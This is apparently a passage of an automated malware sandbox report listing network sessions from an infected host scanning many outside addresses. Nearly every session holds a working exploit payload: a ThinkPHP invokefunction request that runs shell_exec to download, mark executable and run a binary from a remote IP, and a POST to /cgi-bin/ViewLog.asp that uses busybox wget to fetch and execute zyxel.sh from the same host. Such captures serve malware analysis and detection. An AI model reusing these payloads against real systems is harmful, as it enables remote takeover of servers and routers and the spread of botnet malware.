                                                              Data Raw: 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 27 2b 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 6e 61 6d 65 2b 27 3a 27 2b 6c 6f 63 61 74 69 6f 6e 2e 70 6f 72 74 3b 3c 2f 73 63 72 69 70 74 3e 3c 68 31 3e 45 72 72 6f 72 20 34 30 30 20 2d 20 74 72 79 69 6e 67 20 74 6f 20 72 65 64 69 72 65 63 74 3c 2f 68 31 3e
                                                              Data Ascii: <script>document.location.href='https://'+location.hostname+':'+location.port;</script><h1>Error 400 - trying to redirect</h1>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              818192.168.2.2344118112.132.250.8680
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:08.546026945 CET15928OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:20:08.883023977 CET16030INHTTP/1.1 400 Bad Request
                                                              Server: openresty
                                                              Date: Mon, 13 Nov 2023 21:20:08 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 154
                                                              Connection: close
                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              819192.168.2.234439094.187.104.1118080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:08.556916952 CET15928OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              82192.168.2.234830894.23.150.2108080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:21.368071079 CET2706OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              820192.168.2.235852262.29.116.1858080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:08.557420969 CET15929OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              821192.168.2.235511094.122.113.488080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:08.560978889 CET15930OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              822192.168.2.233890662.29.65.2208080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:08.562937021 CET15931OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              823192.168.2.235731495.86.83.2118080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:08.573607922 CET15932OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              824192.168.2.2344138112.132.250.8680
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:08.808876038 CET15968OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:20:09.143084049 CET16046INHTTP/1.1 400 Bad Request
                                                              Server: openresty
                                                              Date: Mon, 13 Nov 2023 21:20:08 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 154
                                                              Connection: close
                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              825192.168.2.2356220112.14.6.1180
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:09.320404053 CET16051OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              826192.168.2.2337536112.218.49.22980
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:09.463468075 CET16054OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:20:09.784996986 CET16090INHTTP/1.1 400 Bad Request
                                                              Server: nginx
                                                              Date: Mon, 13 Nov 2023 21:20:09 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 166
                                                              Connection: close
                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              827192.168.2.2353050112.198.193.18080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:09.674328089 CET16088OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:20:10.029601097 CET16163INHTTP/1.1 400 Bad Request
                                                              Content-Type: text/html; charset=us-ascii
                                                              Server: Microsoft-HTTPAPI/2.0
                                                              Date: Mon, 13 Nov 2023 21:20:52 GMT
                                                              Connection: close
                                                              Content-Length: 311
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              828192.168.2.234623831.217.218.298080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:10.253501892 CET16167OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:10.558136940 CET16175INHTTP/1.1 404
                                                              Content-Type: text/html;charset=utf-8
                                                              Content-Language: en
                                                              Content-Length: 431
                                                              Date: Mon, 13 Nov 2023 21:20:10 GMT
                                                              Keep-Alive: timeout=5
                                                              Connection: keep-alive
                                                              Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 68 31 2c 20 68 32 2c 20 68 33 2c 20 62 20 7b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 68 32 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 68 33 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 70 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 20 61 20 7b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 2e 6c 69 6e 65 20 7b 68 65 69 67 68 74 3a 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                              Data Ascii: <!doctype html><html lang="en"><head><title>HTTP Status 404 Not Found</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 404 Not Found</h1></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              829192.168.2.233358095.214.144.1758080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:10.255436897 CET16168OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              83192.168.2.235586694.120.48.1048080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:21.412947893 CET2708OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              830192.168.2.233376088.207.45.21880
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:10.368001938 CET16173OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              831192.168.2.2354938112.13.73.19980
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:10.779936075 CET16211OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              832192.168.2.234393231.136.34.298080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:10.901099920 CET16274OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:11.908224106 CET16399OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:13.891978979 CET16591OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:17.987590075 CET17154OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:25.922333956 CET18090OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:41.792395115 CET20046OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:21:14.812108994 CET20709OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              833192.168.2.235323831.136.137.918080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:10.901232958 CET16275OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:11.908231020 CET16400OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
